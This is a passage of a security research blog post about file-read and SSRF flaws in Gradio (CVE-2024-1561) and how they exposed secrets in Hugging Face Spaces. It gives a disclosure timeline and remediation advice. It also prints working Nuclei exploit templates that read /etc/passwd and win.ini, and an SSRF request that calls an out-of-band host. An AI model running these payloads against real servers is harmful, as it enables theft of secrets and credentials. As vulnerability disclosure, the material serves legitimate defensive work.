          - "\"?([^\"]+)"

    payloads:
      path:
        - c:\\windows\\win.ini
        - /etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
      
      - type: status
        status:
          - 200

File read against Gradio 3.47 – 3.50.2:


id: CVE-2024-1561-3x
info:
  name: CVE-2024-1561-3x
  author: nvn1729
  severity: high
  description: Gradio LFI when auth is not enabled, this version should work for versions 3.47 - 3.50.2
  reference:
    - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
  classification:
    cvss-score: 7.5
    cve-id: CVE-2024-1561
  tags: cve2024, cve, gradio, lfi

http:
  - raw:
      - |
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"component_id": "{{fuzz_component_id}}", "data": "{{path}}", "fn_name": "make_temp_copy_if_needed", "session_hash": "aaaaaa"}

      - |
        GET /file={{download_path}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: download_path
        internal: true
        group: 1
        regex:
          - "\"?([^\"]+)"
    
    attack: clusterbomb
    payloads:
      fuzz_component_id:
        - 1
        - 2
        - 3
        - 4
        - 5
        - 6
        - 7
        - 8
        - 9
        - 10
        - 11
        - 12
        - 13
        - 14
        - 15
        - 16
        - 17
        - 18
        - 19
        - 20
      path:
        - c:\\windows\\win.ini
        - /etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
      
      - type: status
        status:
          - 200

Exploiting the SSRF against Gradio 3.47-3.50.2:


id: CVE-2024-1561-3x-ssrf
info:
  name: CVE-2024-1561-3x-ssrf
  author: nvn1729
  severity: high
  description: Gradio Full Read SSRF when auth is not enabled, this version should work for versions 3.47 - 3.50.2
  reference:
    - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
  classification:
    cvss-score: 7.5
    cve-id: CVE-2024-1561
  tags: cve2024, cve, gradio, lfi

http:
  - raw:
      - |
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"component_id": "{{fuzz_component_id}}", "data": "http://{{interactsh-url}}", "fn_name": "download_temp_copy_if_needed", "session_hash": "aaaaaa"}

      - |
        GET /file={{download_path}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: download_path
        internal: true
        group: 1
        regex:
          - "\"?([^\"]+)"
    
    payloads:
      fuzz_component_id:
        - 1
        - 2
        - 3
        - 4
        - 5
        - 6
        - 7
        - 8
        - 9
        - 10
        - 11
        - 12
        - 13
        - 14
        - 15
        - 16
        - 17
        - 18
        - 19
        - 20

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        part: body
        regex:
          - <html><head></head><body>[a-z0-9]+</body></html>

Timeline

If you look up CVE-2024-1561 in NVD or MITRE, you’ll see that it was filed by the Huntr CNA and credited to another security researcher on the Huntr platform. In fact, that Huntr report was filed after our original report to Hugging Face, and after the vulnerability was already patched in the mainline. Due to various delays in getting a CVE assigned, Huntr assigned a CVE for this issue prior to us getting a CVE. Here is the actual timeline:

  • Dec. 20, 2023: Horizon3 reports vulnerability over email to Hugging Face.
  • Dec. 24, 2023: Hugging Face acknowledges report
  • Dec. 27, 2023: Fix merged to mainline with commit https://github.com/gradio-app/gradio/pull/6884
  • Dec. 28, 2023: Huntr researcher reports same issue on the Huntr platform here https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
  • Jan 3, 2024: Hugging Face confirms to Horizon3 over email that the vulnerability is fixed with commit https://github.com/gradio-app/gradio/pull/6884 in version 4.13
  • Feb. 2024: Huntr gets confirmation from Gradio this issue is already fixed. Huntr may not have realized it was fixed prior to the report to them.
  • Mar. 17, 2024: Horizon3 checks with Gradio on filing a CVE
  • Mar. 23, 2024: Horizon3 files CVE request with MITRE
  • Apr. 15, 2024: Huntr published CVE-2024-1561
  • May 5, 2024: After multiple follow ups, MITRE assigns CVE-2024-34511 to this vulnerability
  • May 10, 2024: We ask MITRE to reject CVE-2024-34511 as a duplicate after realizing Huntr already had a CVE assigned.

Leaking Secrets in Hugging Face Spaces

As demonstrated above, both vulnerabilities CVE-2023-51449 and CVE-2024-1561 can be used to read arbitrary files from a server hosting Gradio. This includes the /proc/self/environ file on Linux systems containing environment variables. At the time of disclosing these vulnerabilities to Hugging Face, we set up a Hugging Face Space at https://huggingface.co/spaces/nvn1729/hello-world and showed that these vulnerabilities could be exploited to leak secrets configured for the Space. Below is an example of what the environment variable output looks like (with some data redacted). The user configured secrets and variables are shown in bold.


PATH=REDACTED^@HOSTNAME=REDACTED@GRADIO_THEME=huggingface^@TQDM_POSITION=-1^@TQDM_MININTERVAL=1^@SYSTEM=spaces^@SPACE_AUTHOR_NAME=nvn1729^@SPACE_ID=nvn1729/hello-world^@SPACE_SUBDOMAIN=nvn1729-hello-world^@CPU_CORES=2^@mysecret=mysecretvalue^@MEMORY=16Gi^@SPACE_HOST=nvn1729-hello-world.hf.space^@SPACE_REPO_NAME=hello-world^@SPACE_TITLE=Hello World^@myvariable=variablevalue^^@REDACTED

When we heard of the potential breach from Hugging Face on Friday, May 31, we were curious if it was possible that these old vulnerabilities were still exploitable on the Spaces platform. We started up the Space and were surprised to find that it was still running the same vulnerable Gradio version, 4.10, from December.

And the vulnerabilities we had reported were still exploitable. We then the checked the Gradio versions for other Spaces and found that a substantial portion were out of date, and therefore potentially vulnerable to exfiltration of secrets.

It turns out that the Gradio version used by an app is generally fixed at the time a user develops and publishes an app to a Space. A file called README.md controls the Gradio version in use (3.50.2 in this example). It’s up to users to manually update their Gradio version.

We reported the issue to Hugging Face and highlighted that old Gradio Spaces could be exploited by bad actors to steal secrets. Hugging Face responded promptly and implemented measures over the course of a week to harden the Spaces environment:

Hugging Face configured new rules in their β€œweb application firewall” to neutralize exploitation of CVE-2023-51449, CVE-2024-1561, and other file read vulnerabilities reported by other researchers (CVE-2023-34239, CVE-2024-4941, CVE-2024-1728, CVE-2024-0964) that could be used to leak secrets. We iteratively tested different methods for exploiting all of these vulnerabilities and provided feedback to Hugging Face that was incorporated to harden the WAF.

Hugging Face sent out email notifications to users of Gradio Spaces recommending that users upgrade to the latest version.

Along with e-mail notifications, Hugging Face updated their Spaces user interface to highlight if a Space is running an old Gradio version.

Timeline

  • Dec. 18, 2023: We set up a test Space running Gradio 4.10 and demonstrate leakage of Space secrets as part of reporting CVE-2023-51449 and CVE-2024-1561
  • May 31, 2024: Hugging Face discloses potential breach
  • June 2, 2024: We revive the test Space and confirm it’s still running Gradio 4.10 and can be exploited to leak Space secrets. We verify there exist other Spaces running old versions. Β We report this to Hugging Face.
  • June 3 – 9, 2024: Hugging Face updates their WAF based on our feedback to prevent exploitation of Gradio vulnerabilities that can lead to leakage of secrets.
  • June 7, 2024: Hugging Face sends out emails to users running outdated versions of Gradio, and rolls out an update to their user interface recommending that users upgrade.

We appreciate Hugging Face’s prompt response in improving their security posture.

Recommendations

In Hugging Face’s breach advisory, they noted that they proactively revoked some Hugging Face tokens that were stored as secrets in Spaces, and that users should refresh any keys or tokens as well. In this post, we’ve shown that old vulnerabilities in Gradio can still be exploited to leak Spaces secrets, and even if they are rotated, an attacker can still get access to them. Therefore, in addition to rotating secrets, we recommend users double check if they are running an outdated Gradio version and upgrade to the latest version if required.

To be clear: We have no idea whether this method of exploiting Gradio led to secrets being leaked in the first place, but the path we’ve shown in this post was available to attackers up til recently.

To upgrade a Gradio Space, a user can visit the README.md file in their Space and click β€œUpgrade”, as shown below:

Alternatively, users could stop storing secrets in their Gradio Space or enable authentication for their Gradio Space.

While Hugging Face did harden their WAF to neutralize exploitation, we caution users from thinking that this will truly protect them. At best, it’ll prevent exploitation by script kiddies using off-the-shelf POCs. It’s only a matter of time before bypasses are discovered.

Finally for users of Gradio that are exposing it to the Internet using a Gradio share URL or self-hosting, we recommend enabling authentication and also ensuring it’s updated to the latest version.

Sign up for a free trial and quickly verify you’re not exploitable.

Start Your Free Trial

The post Exploiting File Read Vulnerabilities in Gradio to Steal Secrets from Hugging Face Spaces appeared first on Horizon3.ai.

❌
❌